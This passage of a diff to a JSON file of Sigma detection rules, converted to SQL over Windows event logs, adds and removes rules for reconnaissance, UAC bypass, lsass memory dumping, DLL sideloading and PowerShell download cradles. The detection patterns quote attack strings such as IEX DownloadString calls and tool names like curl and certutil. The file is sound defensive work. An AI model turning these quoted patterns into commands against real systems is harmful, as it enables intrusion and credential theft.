'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE 
'%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "Imports Registry Key From a File", - "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "status": "test", - "description": "Detects the import of the specified file to the registry with regedit.exe.", - 
"author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Directory Removal Via Rmdir", + "id": "41ca393d-538c-408a-ac27-cf1e038be80c", + "status": "experimental", + "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "author": "frack113", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate import of keys", - "Evernote" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%rmdir%' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%/q%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_import_keys.yml" + "filename": "proc_creation_win_cmd_rmdir_execution.yml" }, { - "title": "File or Folder Permissions Modifications", - "id": 
"37ae075c-271b-459b-8d7b-55ad5f993dd8", - "status": "test", - "description": "Detects a file or folder's permissions being modified or tampered with.", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine 
LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_susp_file_permission_modifications.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Nslookup PowerShell Download Cradle - ProcessCreation", + "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "proc_creation_win_nslookup_poweshell_download.yml" }, { - "title": "Suspicious Subsystem for Linux Bash Execution", - "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", "status": "experimental", - "description": "Performs execution of specified file, can be used for defensive evasion.", - "author": "frack113", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Software installers that pull packages from remote systems and execute them" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object 
Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bash.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "Net.exe Execution", - "id": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", + "title": "Process Access via TrolleyExpress 
Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "status": "experimental", - "description": "Detects execution of Net.exe, whether suspicious or benign.", - "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1007", - "attack.t1049", - "attack.t1018", - "attack.t1135", - "attack.t1201", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1087.001", - "attack.t1087.002", - "attack.lateral_movement", - "attack.t1021.002", - "attack.s0039" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." 
+ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% group%' ESCAPE '\\' OR CommandLine LIKE '% localgroup%' ESCAPE '\\' OR CommandLine LIKE '% user%' ESCAPE '\\' OR CommandLine LIKE '% view%' ESCAPE '\\' OR CommandLine LIKE '% share%' ESCAPE '\\' OR CommandLine LIKE '% accounts%' ESCAPE '\\' OR CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_net_susp_execution.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Python Inline Command Execution", - "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects execution of python using the \"-c\" flag. 
This is could be used as a way to launch a reverse shell or execute live python code.", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" ], "falsepositives": [ - "Python libraries that use a flag starting with \"-c\". Filter according to your environment" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'python.exe' OR (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_python_inline_command_execution.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "title": "Potential DLL Sideloading Using 
Coregen.exe", + "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_coregen.yml" }, { - "title": "Files Added To An Archive Using Rar.EXE", - "id": "6f3e2987-db24-4c78-a860-b4f4095a7095", - "status": "test", - "description": "Detects usage of \"rar\" to add files to an archive for potential compression. 
An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", + "title": "Amsi.DLL Load By Uncommon Process", + "id": "facd1549-e416-48e0-b8c4-41d7215eedc8", + "status": "experimental", + "description": "Detects loading of Amsi.dll by uncommon processes", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Highly likely if rar is a default archiver in the monitored environment." + "Likely" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ngentask.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_rar_compress_data.yml" + "filename": 
"image_load_dll_amsi_uncommon_process.yml" }, { - "title": "Writing Of Malicious Files To The Fonts Folder", - "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", - "status": "test", - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", - "author": "Sreeman", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", + "status": "experimental", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' 
OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ "attack.execution", - "attack.t1203", "attack.privilege_escalation", - "attack.t1068" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' 
